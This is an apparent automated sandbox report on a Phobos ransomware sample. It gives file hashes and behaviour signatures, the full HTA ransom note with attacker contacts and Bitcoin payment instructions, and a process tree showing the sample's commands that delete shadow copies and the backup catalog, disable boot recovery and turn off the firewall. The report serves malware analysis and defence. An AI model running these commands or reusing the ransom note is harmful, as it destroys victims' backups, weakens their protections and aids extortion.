Analysis

  • max time kernel
    101s
  • max time network
    98s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/03/2025, 21:55 UTC

General

  • Target

    HEUR-Trojan-Ransom.Win32.Phobos.vho-a4c7517fe4548f71f2f2e6848100d638c3bd7d03fa225ca598a03824b7575fd1.7z

  • Size

    35KB

  • MD5

    8e6f83b06c6c010293b8b798102bed1f

  • SHA1

    1c84da8f9bd35cc60bb0e826cf312ba9c7c372b4

  • SHA256

    27aebbda43b8e6e72b1f305b912ca4a506401d9462baf60bc30ce35852984f70

  • SHA512

    9aae2d3e1f54add6bda63828dfbc48d6ad85f0e31345e3638d47715dab9b84df4b4f6e187f8578d40c6af78738db37857bf15ffbe7c7895d2cac1aae028f9f25

  • SSDEEP

    768:1Upgmy0MS3BZYdStnK6gBZ918LXT9spwzcwR2NcmbFimd9SLFYnbzkgwKU5dIBHx:1UimBuu/gB0JsBzNcOj9SLF1f1St

Malware Config

Extracted

Path

C:\info.hta

Ransom Note
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'> <html> <head> <meta charset='windows-1251'> <title>encrypted</title> <HTA:APPLICATION ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no"> <script language='JScript'> window.moveTo(50, 50); window.resizeTo(screen.width - 100, screen.height - 100); </script> <style type='text/css'> body { font: 15px Tahoma, sans-serif; margin: 10px; line-height: 25px; background: #EDEDED; } img { display:inline-block; } .bold { font-weight: bold; } .mark { background: #D0D0E8; padding: 2px 5px; } .header { text-align: center; font-size: 30px; line-height: 50px; font-weight: bold; margin-bottom:20px; } .info { background: #D0D0E8; border-left: 10px solid #00008B; } .alert { background: #FFE4E4; border-left: 10px solid #FF0000; } .private { border: 1px dashed #000; background: #FFFFEF; } .note { height: auto; padding-bottom: 1px; margin: 15px 0; } .note .title { font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; } .note .mark { background: #A2A2B5; } .note ul { margin-top: 0; } .note pre { margin-left: 15px; line-height: 13px; font-size: 13px; } .footer { position:fixed; bottom:0; right:0; text-align: right; } </style> </head> <body> <div class='header'> <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII='> <div>All your files have been encrypted!</div> </div> <div class='bold'>All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail: <span class='mark'>Resp0nse1999@tutanota.com</span></div> <div class='bold'>Write this ID in the title of your message <span class='mark'>7B1DB1F7-2930</span></div> <div class='bold'>In case of no answer in 24 hours write us to this e-mail:<span class='mark'>Resp0nse19999@tutanota.com</span></div> <div class='bold'>Our online operator is available in the messenger Telegram: <span class='mark'><a href='https://t.me/Resp0nse'>@Resp0nse</a></span> <div> You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the tool that will decrypt all your files. </div> <div class='note info'> <div class='title'>Free decryption as guarantee</div> <ul>Before paying you can send us up to 5 files for free decryption. The total size of files must be less than 4Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) </ul> </div> <div class='note info'> <div class='title'>How to obtain Bitcoins</div> <ul> The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. <br><a href='https://localbitcoins.com/buy_bitcoins'>https://localbitcoins.com/buy_bitcoins</a> <br> Also you can find other places to buy Bitcoins and beginners guide here: <br><a href='http://www.coindesk.com/information/how-can-i-buy-bitcoins/'>http://www.coindesk.com/information/how-can-i-buy-bitcoins/</a> </ul> </div> <div class='note alert'> <div class='title'>Attention!</div> <ul> <li>Do not rename encrypted files.</li> <li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li> <li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li> </ul> </div> </body> </html>
Emails

class='mark'>Resp0nse1999@tutanota.com</span></div>

class='mark'>Resp0nse19999@tutanota.com</span></div>

URLs

http://www.w3.org/TR/html4/strict.dtd'>

Signatures

  • Phobos

    Phobos ransomware appeared at the beginning of 2019.

  • Phobos family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
  • Renames multiple (785) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes backup catalog 3 TTPs 2 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Deletes itself 1 IoCs
  • Drops startup file 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 64 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 7 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.Win32.Phobos.vho-a4c7517fe4548f71f2f2e6848100d638c3bd7d03fa225ca598a03824b7575fd1.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2340
  • C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Phobos.vho-a4c7517fe4548f71f2f2e6848100d638c3bd7d03fa225ca598a03824b7575fd1.exe
    "C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Phobos.vho-a4c7517fe4548f71f2f2e6848100d638c3bd7d03fa225ca598a03824b7575fd1.exe"
    1⤵
    • Checks computer location settings
    • Deletes itself
    • Drops startup file
    • Executes dropped EXE
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4640
    • C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Phobos.vho-a4c7517fe4548f71f2f2e6848100d638c3bd7d03fa225ca598a03824b7575fd1.exe
      "C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Phobos.vho-a4c7517fe4548f71f2f2e6848100d638c3bd7d03fa225ca598a03824b7575fd1.exe"
      2⤵
      • Executes dropped EXE
      PID:4996
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1496
      • C:\Windows\system32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:2628
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4112
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:3320
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled no
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:1988
      • C:\Windows\system32\wbadmin.exe
        wbadmin delete catalog -quiet
        3⤵
        • Deletes backup catalog
        PID:684
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5924
      • C:\Windows\system32\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:1500
      • C:\Windows\system32\netsh.exe
        netsh firewall set opmode mode=disable
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:6016
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2820
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2064
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • System Location Discovery: System Language Discovery
      PID:5948
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "F:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1988
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3244
      • C:\Windows\system32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:3820
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5476
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:4024
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled no
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:5812
      • C:\Windows\system32\wbadmin.exe
        wbadmin delete catalog -quiet
        3⤵
        • Deletes backup catalog
        PID:4452
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:5724
  • C:\Windows\system32\wbengine.exe
    "C:\Windows\system32\wbengine.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:5244
  • C:\Windows\System32\vdsldr.exe
    C:\Windows\System32\vdsldr.exe -Embedding
    1⤵
      PID:3468
    • C:\Windows\System32\vds.exe
      C:\Windows\System32\vds.exe
      1⤵
      • Checks SCSI registry key(s)
      PID:4952
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:4872
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\info.txt
      1⤵
      • Opens file in notepad (likely ransom note)
      PID:2348

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R32.dll.id[7B1DB1F7-2930].[Resp0nse1999@tutanota.com].eking

      Filesize

      2.7MB

      MD5

      bb03cfbdebabd4a4d6a3877b8d804667

      SHA1

      cc69eb5064258d85730c203fe16894eb88a43590

      SHA256

      6b73c5e9c3ba3a29dd5013c1d7e32a28b9f78c61290496aaf68d6bc1007672b7

      SHA512

      2036f2f0e2759a21c909d084549867cbd6529735724ef28388c29057b16c1582a8f8d0c65aa424190bcc9bf600270f28928ff5f2f34f462311f54bd9291c987a

    • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

      Filesize

      64KB

      MD5

      d2fb266b97caff2086bf0fa74eddb6b2

      SHA1

      2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

      SHA256

      b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

      SHA512

      c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

    • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

      Filesize

      4B

      MD5

      f49655f856acb8884cc0ace29216f511

      SHA1

      cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

      SHA256

      7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

      SHA512

      599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

    • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

      Filesize

      944B

      MD5

      6bd369f7c74a28194c991ed1404da30f

      SHA1

      0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

      SHA256

      878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

      SHA512

      8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

    • C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Phobos.vho-a4c7517fe4548f71f2f2e6848100d638c3bd7d03fa225ca598a03824b7575fd1.exe

      Filesize

      55KB

      MD5

      3ada72cac8ab9b5578ae56fce08aac52

      SHA1

      175d036720d40787c9d3614623f2f88381396a71

      SHA256

      a4c7517fe4548f71f2f2e6848100d638c3bd7d03fa225ca598a03824b7575fd1

      SHA512

      6551387585f3e7904e6a062123edb7b628bb7996ccb6c129c275728ec9ff76bce1287abe4b6f49d89d4f640f75251af0b7ca443cface087bb34f96203cd6e955

    • C:\Users\Public\Desktop\info.txt

      Filesize

      268B

      MD5

      59103d781c92b08e00d9eacf5e381e23

      SHA1

      dc254f359ef3b42c5617368323d2bfbf79c72f35

      SHA256

      cbb2f848dee8d94628743e5758232ce2500274423cf699532d5918665db10099

      SHA512

      8be870bf04abdd872d12a9d8c1f6eb6fcef97f4f5e81b05c83ae78107c54242e55d88b878f799fc849e7cf22ec92a40ee16b2d9ab95cd6c9baaa423274e87fe5

    • C:\info.hta

      Filesize

      5KB

      MD5

      e0cc46e125ebaf2dc2c0ab07086be03c

      SHA1

      2e997e4d0fd915a86b39c3f3873a74f6b06d2e29

      SHA256

      b7b20db038561830766b67da924beb6af4366402a462fbc7f1f80f50776e81a8

      SHA512

      0d7c2c9d50d383b40d65761b12db992d74f4fd41dba76e19259e0799c483345a8d70bfc71cb99cbbe730128f107dfdb1035cf9b33f9d9f3e5b90a1b6a25f28e7

    • memory/4872-4672-0x0000020052D00000-0x0000020052D01000-memory.dmp

      Filesize

      4KB

    • memory/4872-4694-0x0000020052D00000-0x0000020052D01000-memory.dmp

      Filesize

      4KB

    • memory/4872-4693-0x0000020052D00000-0x0000020052D01000-memory.dmp

      Filesize

      4KB

    • memory/4872-4692-0x0000020052D00000-0x0000020052D01000-memory.dmp

      Filesize

      4KB

    • memory/4872-4691-0x0000020052D00000-0x0000020052D01000-memory.dmp

      Filesize

      4KB

    • memory/4872-4695-0x0000020052D00000-0x0000020052D01000-memory.dmp

      Filesize

      4KB

    • memory/4872-4696-0x0000020052D00000-0x0000020052D01000-memory.dmp

      Filesize

      4KB

    • memory/4872-4697-0x0000020052D00000-0x0000020052D01000-memory.dmp

      Filesize

      4KB

    • memory/4872-4673-0x0000020052D00000-0x0000020052D01000-memory.dmp

      Filesize

      4KB

    • memory/4872-4674-0x0000020052D00000-0x0000020052D01000-memory.dmp

      Filesize

      4KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.